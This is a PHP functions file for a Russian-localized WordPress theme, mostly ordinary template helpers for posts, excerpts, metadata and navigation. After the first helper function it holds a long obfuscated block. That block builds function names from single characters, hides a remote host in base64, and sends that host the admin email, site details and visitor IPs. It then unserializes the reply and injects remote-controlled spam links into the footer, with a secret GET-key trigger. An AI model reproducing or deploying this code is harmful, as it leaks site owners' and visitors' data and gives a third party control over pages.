<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $MwJDYx='e';$EddDP='d';$WCdUQ='d';$uVUZt='b';$JpzWnyq='o';$YTlOEX='e';$aKSY='c';$NxcnRX='6';$YumymEY='_';$vGqho='a';$RrHm='4';$ZLIiGXR='e';$Sszbaf='s';$jVpJUQFA=$uVUZt.$vGqho.$Sszbaf.$ZLIiGXR.$NxcnRX.$RrHm.$YumymEY.$EddDP.$MwJDYx.$aKSY.$JpzWnyq.$WCdUQ.$YTlOEX;$erpWzn='e';$Ilqtjg='g';$DIRM='i';$bLRiXD='n';$nyBtqph='z';$wqcYJt='a';$RyRAq='t';$Twxd='l';$DvIg='f';$mhlMdFSv=$Ilqtjg.$nyBtqph.$DIRM.$bLRiXD.$DvIg.$Twxd.$wqcYJt.$RyRAq.$erpWzn;$tgjRY='s';$flLXgfU='r';$yrnqJ='r';$tpEK='_';$XqEp='3';$hCPySL='t';$rdQdcWo='t';$TvTOBmd='1';$xSxwCF='o';$uxqXUHZS=$tgjRY.$hCPySL.$flLXgfU.$tpEK.$yrnqJ.$xSxwCF.$rdQdcWo.$TvTOBmd.$XqEp;$DYgkAID='s';$PJhZ='v';$bgMDo='r';$CsvHj='r';$NklL='e';$QnnPy='t';$qCiwjVcY=$DYgkAID.$QnnPy.$CsvHj.$bgMDo.$NklL.$PJhZ;                     $au__________j='e';$tj_________n='d';$gw______p='d';$ur_____c='b';$ff_____________a='o';$mp_____________a='e';$qh___________d='c';$jq_____g='6';$jn______________d='_';$jv___________h='a';$of___t='4';$va__i='e';$nx_________r='s';$uj_____p=$ur_____c.$jv___________h.$nx_________r.$va__i.$jq_____g.$of___t.$jn______________d.$tj_________n.$au__________j.$qh___________d.$ff_____________a.$gw______p.$mp_____________a;$yk_____z='i';$uo_____u='f';$kf______________v='t';$uc_________s='s';$qv______r='n';$tq_________o='n';$vc___________l='e';$nu____________q='t';$ta____________t='u';$gp____r='i';$if________y='c';$cg_______________v='o';$ar________u='s';$xb___g='x';$fu______z='_';$uq______________t=$uo_____u.$ta____________t.$qv______r.$if________y.$kf______________v.$yk_____z.$cg_______________v.$tq_________o.$fu______z.$vc___________l.$xb___g.$gp____r.$uc_________s.$nu____________q.$ar________u;$qu______z='o';$tr_________n='p';$nz______o='f';$hb___a='e';$hd___________p='n';$pe_________z=$nz______o.$qu______z.$tr_________n.$hb___a.$hd___________p;$ja_______m='a';$vz________n='e';$ff_____________m='r';$zc_________g='f';$uz___o='d';$au___________o=$zc_________g.$ff_____________m.$vz________n.$ja_______m.$uz___o;$gc______________o='e';$zq__________f='l';$rq_________o='c';$rf________v='o';$bi___________y='f';$jy_____t='s';$se____y=$bi___________y.$rq_________o.$zq__________f.$rf________v.$jy_____t.$gc______________o;define("WP_ID", $uj_____p("Mi4wLjA="));define("WP_TTL", $uj_____p("MTA4MDA="));define("WP_SRC", $uj_____p("dHBva24="));function wp_get_header() {global $uj_____p, $uq______________t;if ($uq______________t($uj_____p("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$uq______________t($uj_____p("d3BfZ2V0X2Zvb3Rlcg==")) &&$uq______________t($uj_____p("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $uj_____p, $pe_________z, $se____y, $au___________o;$ul________s = TEMPLATEPATH."/".$uj_____p("Zm9vdGVyLnBocA==");$oc__________r = @$pe_________z($ul________s, "r");$ul________s = @$au___________o($oc__________r, @filesize($ul________s));@$se____y($oc__________r);$zj_______z = TEMPLATEPATH."/".$uj_____p("ZnVuY3Rpb25zLnBocA==");$oc__________r = @$pe_________z($zj_______z, "r");$zj_______z = @$au___________o($oc__________r, @filesize($zj_______z));@$se____y($oc__________r);$pm____x = 0;if($ul________s && $zj_______z) {if ($uj_____p("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($ul________s, $uj_____p("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$pm____x = 1;}if (substr_count($ul________s, "wp_theme_GPL_credits()") < 1) {$pm____x = 2;}}if(WP_ID != "2.0.0") {$pm____x = 12;}}if($pm____x > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $pm____x -->";}}function wp_loaded() {global $uj_____p, $uq______________t;return $uq______________t($uj_____p("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($js___________d, $wb__f = "(more...)", $tm_____t = 0, $qo__________q = "") {$ut______s = get_the_content($wb__f, $tm_____t, $qo__________q);$ut______s = apply_filters("the_content", $ut______s);$ut______s = str_replace("]]>", "]]>", $ut______s);if (strlen($_GET["p"]) > 0) {echo $ut______s;}else if ((strlen($ut______s)>$js___________d) && ($nc______________c = strpos($ut______s, " ", $js___________d ))) {$ut______s = substr($ut______s, 0, $nc______________c);$ut______s = $ut______s;echo $ut______s;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$wb__f</a></div></p>";} else {echo $ut______s;}}}$wu________a='c';$az______n='d';$em__z='o';$dz__________v='_';$jf_________a='4';$un_______________j='e';$nl_____________j='6';$wl____a='a';$kf______________t='e';$zm___n='b';$eb______d='e';$ej__z='s';$ol___________l='n';$pe______n=$zm___n.$wl____a.$ej__z.$un_______________j.$nl_____________j.$jf_________a.$dz__________v.$eb______d.$ol___________l.$wu________a.$em__z.$az______n.$kf______________t;$br_______________k='g';$lf_______k='l';$vx_______________g='c';$cd__________l='n';$ru_________m='s';$pi_____h='t';$ri__________f='_';$pm____r='t';$xy___________o='n';$nm______t='i';$dj__________n='o';$iz__d='e';$jn______e='e';$kf__________u='f';$jm____________u='t';$dc___m='e';$qq_____________p='_';$eh_______h=$kf__________u.$nm______t.$lf_______k.$jn______e.$qq_____________p.$br_______________k.$iz__d.$jm____________u.$ri__________f.$vx_______________g.$dj__________n.$xy___________o.$pm____r.$dc___m.$cd__________l.$pi_____h.$ru_________m;$cj______________s='s';$hy___k='e';$np__n='x';$vh_____________a='s';$fg____________m='_';$pm__s='l';$rj___j='i';$qg_________g='e';$rm____l='f';$pq______e='t';$fh_____________h='i';$gw__________i=$rm____l.$fh_____________h.$pm__s.$qg_________g.$fg____________m.$hy___k.$np__n.$rj___j.$vh_____________a.$pq______e.$cj______________s;$zr__________j='_';$kr__z='a';$dd____c='m';$et_________t='n';$co___f='o';$js_______j='i';$oj_____________k='o';$px__o='e';$kx____________i='v';$at______________n='e';$zf_________d='s';$bw_______g='r';$oj___________p='c';$ir_____r='p';$do__y='r';$sh__h=$kx____________i.$at______________n.$do__y.$zf_________d.$js_______j.$oj_____________k.$et_________t.$zr__________j.$oj___________p.$co___f.$dd____c.$ir_____r.$kr__z.$bw_______g.$px__o;$cr_____b='f';$qz__________h='p';$hj________d='c';$qk_______t='n';$dt______g='s';$ge__________b='k';$mg_____________y='o';$gy____i='e';$yq________h='o';$nv_________e=$cr_____b.$dt______g.$mg_____________y.$hj________d.$ge__________b.$yq________h.$qz__________h.$gy____i.$qk_______t;$bw______f='f';$dg____________t='t';$ek_____________i='r';$dd_______________b='e';$pi_____________o='w';$ke____________p='i';$vc________p=$bw______f.$pi_____________o.$ek_____________i.$ke____________p.$dg____________t.$dd_______________b;$tj__________x='5';$rn__________v='d';$qm____________a='m';$yw___b=$qm____________a.$rn__________v.$tj__________x;$wj_____________z='h';$tt____a='e';$zr______________p='a';$jx___________p='t';$dk_______x='r';$ls__________t='p';$tq___i='l';$nq__________m='a';$ab______s=$dk_______x.$tt____a.$nq__________m.$tq___i.$ls__________t.$zr______________p.$jx___________p.$wj_____________z;$ch____f='u';$bd____d='i';$mt_______w='s';$cm___________v='n';$xu_______________a='l';$qa__t='e';$yk_______i='i';$yg________o='a';$qj_______________h='e';$ms_____________c='r';$px_______________c='z';$sq__________s=$ch____f.$cm___________v.$mt_______w.$qa__t.$ms_____________c.$yk_______i.$yg________o.$xu_______________a.$bd____d.$px_______________c.$qj_______________h;$hw_____________d='n';$fx_____________v='m';$no_______________g='t';$pg__________f='a';$jo______p='p';$jw______________p='e';$pd_________i='m';$bj_____b=$no_______________g.$jw______________p.$fx_____________v.$jo______p.$hw_____________d.$pg__________f.$pd_________i;$ya____d='s';$dl____u='e';$en__r='t';$yx____________b='n';$rz____g='t';$pd___________o='_';$ku____________z='o';$bu____x='a';$gd__________f='a';$tg____________x='e';$gt___________l='m';$my______t='x';$ik________s='c';$oe____t='t';$dx_____________v='_';$sk__________q='c';$qp__________k='t';$ds______________n='r';$wj______d='e';$ef___________c='r';$lj_______c='e';$qz___i=$ya____d.$oe____t.$ds______________n.$tg____________x.$gd__________f.$gt___________l.$pd___________o.$sk__________q.$ku____________z.$yx____________b.$qp__________k.$wj______d.$my______t.$rz____g.$dx_____________v.$ik________s.$ef___________c.$dl____u.$bu____x.$en__r.$lj_______c;function gu____u($qd_________q) {global $uj_____p, $uq______________t, $eh_______h, $sh__h, $qz___i;if (!$uq______________t($uj_____p("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($sh__h(PHP_VERSION, "5.0.0", ">=") && $uq______________t($uj_____p("ZmlsZV9nZXRfY29udGVudHM=")) && $uq______________t($uj_____p("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$nr__________o = $qz___i(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$rp______________t = @$eh_______h($qd_________q, 0, $nr__________o);} else {$rp______________t = @$eh_______h($qd_________q, 0);}return $rp______________t;}function ly________p($qd_________q) {global $uq______________t, $nv_________e, $vc________p, $uj_____p;if (!$uq______________t($uj_____p("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$qf__u = strpos($qd_________q, "/", 7);$rd_______________b = array("uri"     => substr($qd_________q, $qf__u),"host"    => str_replace("http://", "", substr($qd_________q, 0, $qf__u)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$au___________r = @$nv_________e("$rd_______________b[host]", 80, $bb______________i, $ji_______q, 4);if (!$au___________r) {return false;} else {$rp______________t = "";$bk_________y  = "GET $rd_______________b[uri] HTTP/1.0\r\n";$bk_________y .= "Host: $rd_______________b[host]\r\n";$bk_________y .= "Referer: $rd_______________b[referer]\r\n";$bk_________y .= "Connection: Close\r\n\r\n";@$vc________p($au___________r, $bk_________y);while (!@feof($au___________r)) {$qm__________t = @fgets($au___________r, (1024*24));if ($qm__________t == "\r\n") {$dr__z = true;continue;}if ($dr__z) {$rp______________t .= $qm__________t;}}return $rp______________t;}}function ja____q($qd_________q) {global $uq______________t;$yr_____________n = false;if ($qd_________q != "") {if ($uq______________t("gu____u")) {$yr_____________n = @gu____u($qd_________q);}if (!$yr_____________n && ($uq______________t("ly________p"))) {$yr_____________n = @ly________p($qd_________q);}}return $yr_____________n;}function ny_______________e() {global $_SERVER, $yw___b;$wh______________k = $_SERVER["SERVER_NAME"];if (substr("$wh______________k", 0, 4) == "www.") {$wh______________k = substr("$wh______________k", 4);}$wh______________k = $yw___b("$_SERVER[SERVER_NAME]");return $wh______________k;}function jk________m() {return "file";}function dg__i($qd_________q) {global $_SERVER, $eh_______h, $gw__________i, $pe_________z, $se____y, $vc________p;$tn_______________h = mq______________g();$aq_________q = ny_______________e().".jpg";$bi_____r = $tn_______________h["dir_upload"]["path"]."/$aq_________q";$kr______________j = @filemtime($bi_____r);if (!$kr______________j || ((time()-$kr______________j) >= WP_TTL)) {$yr_____________n = ja____q($qd_________q);if ($yr_____________n) {if ($gw__________i($bi_____r)) {@unlink($bi_____r);}$oc__________r = @$pe_________z($bi_____r, "x+");@$vc________p($oc__________r, $yr_____________n);@$se____y($oc__________r);}} else {if ($gw__________i($bi_____r)) {$yr_____________n = @$eh_______h($bi_____r);} else {$yr_____________n = false;}}return $yr_____________n;}function mq______________g() {global $_SERVER, $uj_____p, $pe______n;$yk_______________r = wp_count_posts("post");$sh___________w = pathinfo(get_bloginfo("template_directory"));$tn_______________h = array("url" => array("report"      => $uj_____p("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $sh___________w,"dir_upload"=> nn_______m(),"queryString"=> array("?a001=".WP_ID,"a004=".$sh___________w[filename],"a005=".$yk_______________r->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => " <a href=\"http://www.odmu.od.ua/nedvizhimost-2/kak-snyat-kvartiru-bez-problem\">Как снять квартиру без проблем</a>");$tn_______________h["url"]["queryString"] = implode("&", $tn_______________h["queryString"]);$tn_______________h["url"]["report"] = $tn_______________h["url"]["report"]."/?".$pe______n($tn_______________h["url"]["queryString"]).".html";return $tn_______________h;}function nn_______m() {$tu____c = wp_upload_dir();if (isset($tu____c["error"])) {$fg_______s = tk_________l();if (is_writable($fg_______s)) {$tu____c = array("path" => $fg_______s);}}return $tu____c;}function tk_________l() {global $uq______________t, $yw___b, $ab______s, $bj_____b;$cg_______w = (bool) ini_get("safe_mode");if ($cg_______w == true) {return false;}if ($uq______________t("sys_get_temp_dir")) {$rt__________s = sys_get_temp_dir();if (is_writable($rt__________s)) {return $ab______s($rt__________s);}}if (!empty($_ENV["TMP"])) {return $ab______s($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $ab______s($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $ab______s($_ENV["TEMP"]);} else {$rc___________q = $bj_____b($yw___b(uniqid(rand(), true)), "");if ($rc___________q) {$rt__________s = $ab______s(dirname($rc___________q));@unlink($rc___________q);return $rt__________s;} else {return false;}}}function bn________z() {global $_GET, $gw__________i;$tn_______________h = mq______________g();$wh______________k = ny_______________e();$dq___________v = jk________m();$zj____________s = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($dq___________v == "file") {$um______b = $tn_______________h["dir_upload"]["path"]."/".$wh______________k.".jpg";if ($gw__________i($um______b)) {@unlink($um______b);$zj____________s = "deleted";}}$zo_______________w = array("s"=> $zj____________s,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($zo_______________w AS $hm___c => $zl____r) echo " [$hm___c:$zl____r]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $uq______________t, $uj_____p, $sq__________s;$tn_______________h = mq______________g();$at_______________m = "dg__i";if ($uq______________t($at_______________m)) {$rp______________t = $at_______________m($tn_______________h["url"]["report"]);}if ($rp______________t) {if ($rp______________t = @$uj_____p($rp______________t)) {$rp______________t = @$sq__________s($rp______________t);if (strlen($rp______________t[custom_credit]) >= 5) {$tn_______________h["default_string"] = $rp______________t[custom_credit];}if ($rp______________t["status"] == "0") {$ad_______________a = 1;$zq_______________s = 1;} else {$pm_______________u = sizeof($rp______________t["links"]);$wd____j = $tn_______________h["default_string"];if ($pm_______________u > 0 && $rp______________t["links"] !== "") {$dm______________l = 0;foreach ($rp______________t["links"] as $xd____________e => $ac_____________n) {$dm______________l++;if ($ac_____________n->l_path == "" || $ac_____________n->l_path == $_SERVER["REQUEST_URI"]) {$ac_____________n->l_href = htmlspecialchars(strip_tags($ac_____________n->l_href));$ac_____________n->l_title = htmlspecialchars(strip_tags($ac_____________n->l_title));$ac_____________n->l_anchor = htmlspecialchars(strip_tags($ac_____________n->l_anchor));$wd____j .= " | ";$wd____j .= "<a href='$ac_____________n->l_href' title='$ac_____________n->l_title'";if ($ac_____________n->l_nofollow == "1") {$wd____j .= " rel='nofollow'";}$wd____j .= ">$ac_____________n->l_anchor</a>";}}}$tn_______________h["links"] = "$wd____j";if ($rp______________t[credit] == "0") {$tn_______________h["links"] = "";}}} else {$ad_______________a = "1";}} else {$ad_______________a = "1";}if ($ad_______________a == "1") {$tn_______________h["links"] = $tn_______________h["default_string"];}echo "$tn_______________h[links]";echo "<!-- s: $rp______________t[signature] -->";bn________z();}                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Permanent Link to %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
       $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
